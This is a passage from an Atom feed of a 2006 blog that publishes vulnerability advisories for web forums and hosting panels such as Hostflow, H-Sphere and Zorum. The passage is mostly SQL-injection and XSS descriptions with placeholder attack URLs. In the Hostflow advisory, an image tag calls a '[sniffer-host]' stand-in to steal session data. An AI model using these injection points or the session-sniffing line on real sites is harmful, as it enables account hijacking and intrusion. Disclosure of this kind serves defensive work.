http://secunia.com/advisories/20825/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Disable Active Scripting support.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115143614539370515?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115143614539370515/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115143614539370515' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115143614539370515'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115143614539370515'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/multiple-browsers-information.html' title='Multiple Browsers Information Disclosure vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115141620046398827</id><published>2006-06-27T15:49:00.000+02:00</published><updated>2007-04-12T06:03:12.193+02:00</updated><title type='text'>Hostflow vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.hostflow.com/&lt;br /&gt;affected versions:2.2.1-15 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Hostflow contains a flaw which could allow a remote attacker to hijack user sessions.  A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;post: &lt;br /&gt;(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")&lt;br /&gt;note: change "(" to "&lt;" and ")" to "&gt;" &lt;br /&gt;&lt;br /&gt;2. or it also will works with simple refferal url function. &lt;br /&gt;For manual testing use html code and create hyperlink to resource wich will show you refferal url´s in example some hit counter or statistic apllication do it well. &lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115141620046398827?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115141620046398827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115141620046398827' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115141620046398827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115141620046398827'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/hostflow-vuln.html' title='Hostflow vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115138273462034549</id><published>2006-06-27T06:31:00.000+02:00</published><updated>2006-11-25T18:34:54.560+01:00</updated><title type='text'>HSPcomplete vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.swsoft.com/en/products/hspcomplete/&lt;br /&gt;affected versions:3.2.2 , 3.3 Beta and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;HSPcomplete contains a flaw that allows a remote sql injection attacks.Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115138273462034549?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115138273462034549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115138273462034549' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115138273462034549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115138273462034549'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/hspcomplete-vuln.html' title='HSPcomplete vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115137931935113156</id><published>2006-06-27T05:34:00.000+02:00</published><updated>2006-06-28T15:23:13.163+02:00</updated><title type='text'>H-Sphere &lt;=2.5.x XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;vendor:http://www.psoft.net/h_sphere2_info.html&lt;br /&gt;affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)&lt;br /&gt;and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;H-Sphere contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next_template","start","curr_menu_id","arid" parameters isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_&lt;br /&gt;menu_id=&amp;start=&amp;next_template=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_men&lt;br /&gt;u_id=&amp;start=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP&lt;br /&gt;?template_name=mailman/massmail.html&amp;arid=46&amp;curr_me&lt;br /&gt;nu_id=[XSS]&lt;br /&gt;&lt;br /&gt;http://[host]/psoft/servlet/resadmin/psoft.hsphere.C&lt;br /&gt;P?template_name=mailman/massmail.html&amp;arid=[XSS]&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115137931935113156?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115137931935113156/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115137931935113156' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115137931935113156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115137931935113156'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/h-sphere-25x-xss-vuln.html' title='H-Sphere &lt;=2.5.x XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115134858020805345</id><published>2006-06-26T21:01:00.000+02:00</published><updated>2007-03-29T02:28:39.916+02:00</updated><title type='text'>Zorum Forum &lt;=3.5 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 26 june 2006&lt;br /&gt;vendor:http://zorum.phpoutsourcing.com/&lt;br /&gt;affected versions:3.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;Zorum Forum contains a flaw that allows a remote sql injection attacks.Input passed to the "offset","tid","fromid","sortby","fromfrommethod","fromfromlist" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;Zorum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "frommethod","list","method"  parameter in "index.php" and most parameters from SQL injection vuln. isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Additional info:&lt;br /&gt;Some of those parameters by both vulnerabilities will give Full Path Disclosure and there will be many other parameters wich isnt  properly sanitised.&lt;br /&gt;And if it will be not enough you can aslo figure out something like sql injection form search engine module, just try to add in any possible field some "unsanitised" input and you will see. &lt;br /&gt;&lt;br /&gt;ref:&lt;br /&gt;&lt;a href="http://secunia.com/advisories/16504/"&gt;Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.milw0rm.com/exploits/1509"&gt;Zorum forum 3.5 sql injection exploit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115134858020805345?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115134858020805345/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115134858020805345' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115134858020805345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115134858020805345'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/zorum-forum-35-vuln.html' title='Zorum Forum &lt;=3.5 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115132566822404225</id><published>2006-06-26T14:38:00.000+02:00</published><updated>2006-06-26T14:41:08.773+02:00</updated><title type='text'>Хакер (Андрей Житков)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger/725/1421/1600/xakep.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/blogger/725/1421/320/xakep.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Он – хакер. Гений и хулиган. Его цель – взломать банковскую сеть и стать миллионером. Для него это не более чем компьютерная игра. Но вскоре он сам становится персонажем чьей-то совсем не виртуальной игры, а его друзья и знакомые погибают от настоящего, а не виртуального оружия…&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.book-portal.info/files/zhitkov_andrei_haker.rtf.rar"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115132566822404225?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115132566822404225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115132566822404225' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115132566822404225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115132566822404225'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/blog-post.html' title='Хакер (Андрей Житков)'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115125476792849076</id><published>2006-06-25T18:58:00.000+02:00</published><updated>2006-06-25T18:59:28.080+02:00</updated><title type='text'>DeluxeBB &lt;=1.07 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.deluxebb.com/&lt;br /&gt;affected versions:1.07 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;DeluxeBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subject" and "to" parameter in "pm.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125476792849076?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115125476792849076/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115125476792849076' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125476792849076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125476792849076'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/deluxebb-107-xss-vuln.html' title='DeluxeBB &lt;=1.07 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115125341287369972</id><published>2006-06-25T18:35:00.000+02:00</published><updated>2006-12-11T00:43:31.180+01:00</updated><title type='text'>ICT - Infinite Core Technologies vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.infinitecore.com/&lt;br /&gt;affected versions:1.0 Gold and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;ICT contains a flaw that allows a remote sql injection attacks.Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125341287369972?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115125341287369972/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115125341287369972' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125341287369972'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125341287369972'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ict-infinite-core-technologies-vuln.html' title='ICT - Infinite Core Technologies vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115125035347020551</id><published>2006-06-25T17:45:00.000+02:00</published><updated>2006-06-25T17:45:53.870+02:00</updated><title type='text'>OpenForum XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:www.2enetworx.com/dev/projects/openforum.asp&lt;br /&gt;affected versions:1.2 Beta and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;OpenForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ofdisp" and "ofmsgid" parameter in "openforum.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125035347020551?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115125035347020551/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115125035347020551' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125035347020551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115125035347020551'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/openforum-xss-vuln.html' title='OpenForum XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115119956960577518</id><published>2006-06-25T03:38:00.000+02:00</published><updated>2007-03-31T00:28:47.080+02:00</updated><title type='text'>GL-SH Deaf Forum XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.frank-karau.de/&lt;br /&gt;affected versions:6.4.3 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;GL-SH Deaf Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115119956960577518?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115119956960577518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115119956960577518' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115119956960577518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115119956960577518'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/gl-sh-deaf-forum-xss-vuln.html' title='GL-SH Deaf Forum XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115118984698597813</id><published>2006-06-25T00:57:00.000+02:00</published><updated>2006-06-26T18:19:01.730+02:00</updated><title type='text'>phpQLAdmin vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://phpqladmin.com&lt;br /&gt;affected versions:2.2.x and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;phpQLAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115118984698597813?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115118984698597813/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115118984698597813' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115118984698597813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115118984698597813'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/phpqladmin-vuln.html' title='phpQLAdmin vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115117444417044503</id><published>2006-06-24T20:40:00.000+02:00</published><updated>2006-06-24T20:40:44.340+02:00</updated><title type='text'>XennoBB XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 24 june 2006&lt;br /&gt;vendor:http://www.xennobb.com/&lt;br /&gt;affected versions:1.0.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;XennoBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115117444417044503?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115117444417044503/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115117444417044503' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115117444417044503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115117444417044503'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/xennobb-xss-vuln.html' title='XennoBB XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115115352633044516</id><published>2006-06-24T14:23:00.000+02:00</published><updated>2006-06-24T23:11:14.030+02:00</updated><title type='text'>btw ...</title><content type='html'>Somebody was asked to me why coments on this blog is "censured" - moderated.&lt;br /&gt;Every day tehere are almost 50 spammers with comercial spam, like credit loans  and other shit...im not suprissed cauz many of my reports/advisories are ecommerce webaplications. &lt;br /&gt;To fight with spammers ..hm... if it was one ..it will be not so dificult , but ... &lt;br /&gt;Any way spam sucks... &lt;br /&gt;&lt;br /&gt;In my last post i told that i will not have time to publish advisories and report about unsecured systems and i told that i will post 10-15 and thats will be end and other guys or VietMafia will continue contribute blog with advisories. &lt;br /&gt;IN place of 10-15 is more than 50 became , cauz VietMafia didnt .... So for me its to easy to do nothin, thats why i didnt stop..even my time is limited . I will continue so long as i can. &lt;br /&gt;&lt;br /&gt;And again there is some developers (2 from 50) who are shocked that i didnt contacted them and reported about vuln. &lt;br /&gt;I regullary try to do this in every 100 advisory i try, so no succesfull result till now, so why i must? &lt;br /&gt;So i think that we stay in one point, i can do only my job wih success if you do mistakes, if you dont i can do my job.&lt;br /&gt;Everyone have mistakes  and im not better than you , its just my job to find out some mistakes. &lt;br /&gt;In that point i wanna also say thanks to Secunia and OSVDB guys for support. &lt;br /&gt;&lt;br /&gt;And till now i didnt wrote article about wich i had promissed to write,cauz im waiting when cembo will complete PVS-Pridels Vuln Scanner , if its will be great tool my meaning  can change and content of article to, thats why i better wait. &lt;br /&gt;And before it will be published i will try as alternative for my fingers... :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115115352633044516?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115115352633044516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115115352633044516' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115115352633044516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115115352633044516'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/btw.html' title='btw ...'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115111624687570845</id><published>2006-06-24T04:29:00.000+02:00</published><updated>2007-04-10T12:42:12.670+02:00</updated><title type='text'>mvnForum  XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 24 june 2006&lt;br /&gt;vendor:http://www.mvnforum.com/&lt;br /&gt;affected versions:1.0 GA and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;mvnForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "member" and "activatecode" parameters in activatemember isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;mvnForum/activatemember?activatecode=&amp;mem&lt;br 